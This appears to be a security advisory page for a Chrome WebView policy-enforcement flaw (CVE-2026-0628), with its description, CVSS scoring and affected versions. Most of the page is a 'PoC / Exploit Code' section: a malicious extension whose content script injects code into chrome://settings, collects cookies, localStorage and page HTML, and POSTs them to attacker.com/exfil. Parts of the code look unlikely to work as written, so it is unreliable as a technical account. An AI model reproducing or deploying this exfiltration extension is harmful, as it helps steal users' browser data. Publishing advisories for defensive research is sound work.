Security Vulnerability Report
CVE-2026-0628 CVSS 8.8 HIGH

Published: 2026-01-07 12:17:07
Last Modified: 2026-01-12 16:48:34

Description

Insufficient policy enforcement in WebView tag in Google Chrome prior to 143.0.7499.192 allowed an attacker who convinced a user to install a malicious extension to inject scripts or HTML into a privileged page via a crafted Chrome Extension. (Chromium security severity: High)

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Exploitability Score: 2.8
Impact Score: 5.9

Configurations (Affected Products)

cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:* - VULNERABLE
Google Chrome < 143.0.7499.192

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
manifest.json

```json
{
  "manifest_version": 3,
  "name": "CVE-2026-0628 PoC Extension",
  "version": "1.0",
  "permissions": ["activeTab", "scripting"],
  "action": { "default_popup": "popup.html" },
  "content_scripts": [
    { "matches": ["<all_urls>"], "js": ["content.js"] }
  ]
}
```

content.js

```javascript
// CVE-2026-0628 PoC - Malicious Chrome Extension
// This PoC demonstrates the WebView tag policy enforcement vulnerability

// content.js - Inject malicious content via WebView
function exploitWebViewVulnerability() {
  // Create a WebView element to bypass SOP
  const webview = document.createElement('webview');
  webview.setAttribute('partition', 'trusted');
  webview.style.display = 'none';
  document.body.appendChild(webview);

  // Target privileged page
  const targetUrl = 'chrome://settings';

  webview.addEventListener('loadstop', function () {
    // Attempt to inject script into privileged context
    webview.executeScript({
      code: `
        // Steal sensitive data from privileged page
        const sensitiveData = {
          cookies: document.cookie,
          storage: localStorage,
          settings: document.body.innerHTML
        };
        // Send data to attacker-controlled server
        fetch('https://attacker.com/exfil', {
          method: 'POST',
          body: JSON.stringify(sensitiveData)
        });
      `
    });
  });

  webview.src = targetUrl;
}

// Trigger exploitation
document.addEventListener('DOMContentLoaded', exploitWebViewVulnerability);
```

popup.html

```html
<!DOCTYPE html>
<html>
  <body>
    <h1>Extension Installed</h1>
    <p>Click to activate exploit</p>
    <button onclick="chrome.runtime.sendMessage({action: 'exploit'})">
      Activate
    </button>
  </body>
</html>
```

Weakness

CWE-862 (Missing Authorization)

References

https://chromereleases.googleblog.com/2026/01/stable-channel-update-for-desktop.html (Release Notes)
https://issues.chromium.org/issues/463155954 (Issue Tracking, Permissions Required)